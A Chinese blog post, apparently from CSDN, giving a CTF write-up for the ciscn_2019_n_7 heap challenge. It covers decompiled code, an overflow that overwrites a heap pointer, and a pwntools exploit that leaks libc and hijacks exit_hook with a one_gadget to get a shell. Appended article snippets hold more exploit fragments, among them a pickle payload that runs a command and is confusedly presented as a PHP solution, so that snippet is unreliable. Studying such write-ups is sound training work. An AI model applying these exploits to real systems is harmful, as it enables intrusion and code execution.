ciscn_2019_n_7

最新推荐文章于 2025-05-10 09:55:35 发布
最新推荐文章于 2025-05-10 09:55:35 发布
阅读量129 收藏
点赞数
分类专栏: Buuoj刷题 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_62887641/article/details/132867225
版权
文章描述了一段64位保护下的C代码,展示了如何通过文件操作、内存溢出和字符串处理,利用漏洞获取chunk内存并实现libc函数泄露,最终意图执行onegadget以获取shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ciscn_2019_n_7

Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    Canary found
NX:       NX enabled
PIE:      PIE enabled
FORTIFY:  Enabled

64位保护全开

unsigned int INIT()
{
  FILE *v0; // rbx
  char v1; // al

  v0 = fopen("log.txt", "r");
  while ( 1 )
  {
    v1 = fgetc(v0);
    if ( v1 == -1 )
      break;
    IO_putc(v1, stdout);
  }
  fclose(v0);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 1, 0LL);
  setvbuf(stderr, 0LL, 1, 0LL);
  BSSPTR = malloc(0x18uLL);
  return alarm(0x3Cu);
}

这里申请了一个chunk,并且是通过BSSPTR指针指向

unsigned __int64 ADD()
{
  int v0; // eax
  _QWORD *v1; // r12
  char v3[8]; // [rsp+0h] [rbp-28h] BYREF
  unsigned __int64 v4; // [rsp+8h] [rbp-20h]

  v4 = __readfsqword(0x28u);
  if ( BSSFLAG )
  {
    puts("Exists! Now,you can edit your article.");
  }
  else
  {
    puts("Input string Length: ");
    read(0, v3, 8uLL);
    v0 = strtol(v3, 0LL, 10);
    if ( (unsigned __int64)v0 > 0x100 )
    {
      puts("Large!");
    }
    else
    {
      v1 = BSSPTR;
      *BSSPTR = v0;								//[0]放入size
      v1[2] = malloc(v0);						//[2]放入malloc chunk指针
      BSSFLAG = 1;
      puts("Author name:");
      read(0, BSSPTR + 1, 0x10uLL);				//[1]放入可写的content
      puts("Now,you can edit your article.");
    }
  }
  return __readfsqword(0x28u) ^ v4;
}

add这里是只能申请一个chunk,然后在29行结合下面的edit,有个溢出,

int EDIT()
{
  if ( !BSSFLAG )
    return puts("Dont't exists.");
  puts("New Author name:");
  read(0, BSSPTR + 1, 0x10uLL);
  puts("New contents:");
  read(0, (void *)BSSPTR[2], *BSSPTR);
  return puts("Over.");
}

这个name是可以输入0x10字节,然后可以溢出到[2],也就是更改掉chunk B 的指针

并且给了泄露puts的libc

__int64 LIBC66666()
{
  return _printf_chk(1LL, &unk_10D4, &puts);
}

思路

泄露libc求出exit_hook,然后exit_hook改成onegadget,我们退出程序就可以getshell

在这里插入图片描述

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",25330,"./pwn",0)
context(os='linux', arch='amd64',log_level='debug')
libc=ELF('libc-2.23.so')

sla(menu,b'666')
ru(b'0x')
leak=int(r.recv(12),16)-libc.sym['puts']
exit=leak+0x5f0040+3848#+0x626040+3848#
one=[0x45216,0x4526a,0xf02a4,0xf1147]
li(leak)

add(0x20,p64(0)+p64(exit))
edit(b'c',p64(one[3]+leak))
#debug()
sl(b'a')
ia()

在这里插入图片描述

BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2716
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
[BUUCTF]-PWN:ciscn_2019_n_3解析
2301_79326813的博客
01-20 912
堆题,先看保护32位,Partial RELRO,没pie关键信息就那么多,看ida大致就是alloc创建堆块,free释放堆块,dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中,会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试,可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址,我们在free堆块时他都会执行,并且题目给了我们system。
【exit hook】ciscn_2019_n_7
huzai9527的博客
04-19 716
【exit hook】ciscn_2019_n_7 1.ida分析 输入666获得puts地址,计算libc偏移 输入name的时候,可以输入16个字节,但是只有前8个字节可用,后面8个字节是content的指针 2.思路 通过puts计算libc的偏移 溢出到content指针,修改为exit_hook的地址 edit将exit_hook改为onegadget 3.exp from pwn import * p = remote('node3.buuoj.cn',28010)
ciscn_2019_n_7(exit_hook)、wdb_2018_1st_babyheap(fsop的例子)
weixin_46521144的博客
09-08 1270
ciscn_2019_n_7 劫持exit_hook 这道题考察比较单一,劫持exit_hook即可 在ida里面看到,首先会在本地寻找一个log.txt,否则直接段错误。因此现在本地创建一个log.txt。写不写内容都可以。 接下来是exit_hook的位置 exit_hook的位置 在libc-2.23中 exit_hook = libc_base+0x5f0040+3848 exit_hook = libc_base+0x5f0040+3856 在libc-2.27中 exit_hook = lib
[BUUOJ] ciscn_2019_n_3
Joaus的博客
10-06 1876
这里写自定义目录标题漏洞点漏洞利用exp 漏洞点 可以看到主要就是在free的时候没有将相应的数组里的置0,可以导致UAF的漏洞: 漏洞利用 由于本题将printf和free函数的指针都放在了申请的堆上,而且程序调用了system函数因此我们就不用泄露libc基址了,我们的目标就是取得对存放指针的堆块的控制。 我们可以利用fastbin的LIFO的机制,取得对存放指针的堆块的控制,修改free指...
BUU CTF ciscn_2019_n_1
A_fish_like_sing的博客
03-20 1943
新手向对BUU CTF ciscn_2019_n_1该题的两种解法
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
BUUCTF ciscn_2019_c_1 题解
qq_51802916的博客
08-20 478
这个地方还会涉及到堆栈对齐的问题,有时候POC都构造正确了,但是运行时仍然报段错误,可能就是堆栈没有对齐,这是我们可以加入一条ret指令,改变一下堆栈,例如假如rsp指向了0xff88,这是一个没有对齐的地址,增加ret后就会变成0xff90,这个一个已经对齐的地址,可以正常运行。,这里显然可以进行缓冲区溢出利用,中间的部分是对字符串进行处理,我们不需要看得太仔细,因为可以通过传入\x00字符使循环提前终止,这样就不会影响我们的payload的了。的装载地址和shell字符串的装载地址,然后构造POC了。
ciscn_2019_en_3
fayinq的博客
03-14 543
ciscn_2019_en_3 首先写在前面的话,这道题找到关键点之后不能说十分简单,只能说非常的简单,但是这个题还是卡了我不久时间,最开始想了半天怎么泄露出libc地址,学过的方法全是不行,血压当场up。但是看了wp一眼之后就能秒杀了,当场高血压。 函数分析: Func_init(): Func_Execute(): 这其中本来是4个函数,但是show()和edit()函数没有东西,所以命名就省略了 Func_ADD(): Func_Free(): FREE的地方很明显,他
buuctf——ciscn_2019_n_8
qq_41560595的博客
03-21 671
查看权限 开了好多权限 查看源代码 分析 观察,var数组是int类型,在内存中占了4个字节。输入一个字符串,令var[13]处的值是17,且这个值占4个字节,就能拿到shell。 var中每一个元素占4个字节,payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节,就要用p64打包。 解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*
第十四届全国大学生信息安全竞赛-线上赛Writeup
热门推荐
末初 - mochu7
05-16 1万+
第十四届全国大学生信息安全竞赛
水几个pwn
Stella_Leo的博客
08-24 316
author: moqizou 2020-羊城杯-signin 签到题目2.23的glibc add - 最多10个chunk然后会malloc(0x28)之后就是namesize结构体如下 0x10 chunk 头 0x8 1 inuse位置 0x8 buf->name_chunk 0x8 23字节的message 0x8 看上面可以溢出 然后会把该chunk指针 存入全局table view 通过判断inuse输出name和message del uaf,只清除chunk_table和name.
ciscn_2019_n_8 wirte bss data
pondzhang的专栏
05-02 297
from pwn import * p = process("./ciscn_2019_n_8") p.recvuntil('name?\n') payload = p32(0x11) * 14 p.sendline(payload) p.interactive()
引言:Client Hello 为何是 HTTPS 安全的核心?
最新发布
2501_90994755的博客
05-10 286
Cipher Suites TLS_AES_256_GCM_SHA384 TLS 1.3 仅保留 5 个强密码套件,而 TLS 1.2 支持数十种(需谨慎过滤弱算法)openssl s_client -connect example.com:443 -tls1_3 # 手动测试 TLS 1.3。使用 TLS_RSA_WITH_3DES_EDE_CBC_SHA(3DES 算法已过时,易受 SWEET32 攻击)。欢迎在评论区分享经历!
7.2.安全防御
2301_79902294的博客
05-07 849
• 密码存储:BCrypt与Argon2算法实现(Spring Security) • 多因素认证(MFA):TOTP集成(Google Authenticator API) • 生物识别安全:活体检测与本地存储(Android Biometric API)• 数据库加密:透明数据加密(TDE)、字段级加密(Jasypt) • 文件存储安全:权限控制(Linux ACL)、客户端加密(WebCrypto API) • 备份与恢复策略:异地加密备份(AWS S3 + KMS)-- 身份证号 -->
中级注册安全工程师的《安全生产专业实务》科目如何选择专业?
m0_60557936的博客
05-07 486
中级注册安全工程师的《安全生产专业实务》有 7 个专业方向,选择时可考虑以下几个方面:
渗透测试行业术语2
2301_76419201的博客
05-09 920
内生安全有三个特性,即依靠信息化系统与安全系统的聚合、业务数据与安全数 据的聚合以及 IT 人才和安全人才的聚合,从信息化系统的内部,不断长出自适 应、自主和自成长的安全能力。根据 Gartner 的定义,威胁情报是某种基于证据的知识,包括上下文、机制、标 示、含义和能够执行的建议,这些知识与资产所面临已有的或酝酿中的威胁或危 害相关,可用于资产相关主体对威胁或危害的响应或处理决策提供信息支持。这样一来,这些浏览器所在的服务器跟用户所在环境中的终端和网络是隔离的, 从而使得客户所在网络的暴露面大大降低。
一种安全不泄漏、高效、免费的自动化脚本平台
m0_62259629的博客
05-09 775
冰狐智能辅助(IceFoxIntelligentAssistant)是一款基于JavaScript的自动化脚本开发工具,旨在降低自动化开发门槛,适用于Android系统(7.0及以上)。其核心功能包括低代码开发、多场景覆盖、云服务集成和跨平台兼容,广泛应用于电商运营、社交媒体、游戏脚本等领域。冰狐智能辅助在安全性上采取多层次防护策略,如本地脚本存储与加密、隐私保护机制、权限精细化控制和卡密功能,确保用户数据与脚本内容的安全。其免费策略通过基础功能开放+增值服务收费实现可持续发展,核心功能零成本,社区生态支持
ciscn_2019_n_8
03-24
### 关于CISCN 2019 N8题目的解析 在全国大学生信息安全竞赛(CISCN)中,Web方向的题目通常涉及漏洞利用、文件包含、反序列化攻击等内容。对于CISCN 2019中的N8题目,其核心考点可能围绕PHP反序列化漏洞展开。 #### PHP反序列化漏洞分析 在CISCN 2019 Web1题目中提到的内容表明,该赛事的部分题目设计基于PHP对象反序列化的特性[^2]。具体到N8题目,可能存在类似的机制: - **Payload构造**:通过精心构造的对象结构触发特定逻辑路径,实现任意文件读取或其他敏感操作。 - **关键点提示**:根据已有资料,在某些情况下需要调整`Handle`类的相关属性来适配目标环境的要求[^5]。 以下是针对此类问题的一个通用解决思路及其Python脚本示例用于生成payload: ```python import pickle class Exploit(object): def __reduce__(self): import os command = 'cat /flag' # 假设我们需要执行命令获取flag return (os.system, (command,)) def serialize_exploit(): serialized_data = pickle.dumps(Exploit()) with open('exploit_payload', 'wb') as f: f.write(serialized_data) serialize_exploit() ``` 需要注意的是上述代码仅为演示如何创建一个简单的pickle反序列化攻击向量,并不适用于实际比赛场景下的PHP应用;真正的解决方案需依据具体的程序行为模式定制相应的php序列化字符串形式的数据包提交给服务器端处理以达成预期效果。 #### 文件上传与包含技巧 如果N8还涉及到文件上传功能,则可以尝试以下方法绕过检测并植入恶意脚本: - 利用MIME类型校验不足上传图片马; - 结合LFI(Local File Inclusion)缺陷访问已上载至服务器上的特制图像文件完成进一步渗透活动。 综上所述,解答这类综合性较强的CTF赛题不仅考验选手们的技术功底同时也对其创造力提出了较高要求。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值